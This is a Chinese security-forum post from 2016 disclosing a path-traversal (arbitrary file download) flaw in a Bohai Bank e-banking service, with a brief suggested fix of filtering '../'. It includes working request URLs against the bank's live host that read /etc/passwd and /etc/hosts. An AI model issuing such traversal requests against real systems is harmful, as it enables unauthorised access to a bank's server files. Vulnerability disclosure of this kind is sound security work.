HanDs
NO.2

[7月漏洞公开] 渤海银行某系统存在任意文件下载漏洞 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

2年了任意文件下载

详细说明:

14年的洞到现在仍然久未修复,是当时没通知到位吗

QQ截图20160527142857.png





https://ebank.cbhb.com.cn/webappservice/TP050102.do?FileName=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

QQ截图20160527143356.png



QQ截图20160527143417.png

漏洞证明:

https://ebank.cbhb.com.cn/webappservice/TP050102.do?FileName=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhosts

QQ截图20160527143429.png

修复方案:

过滤../


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
渤海 银行 系统 存在 任意 文件下载 漏洞
#1楼
发帖时间:2016-7-14   |   查看数:0   |   回复数:0
游客组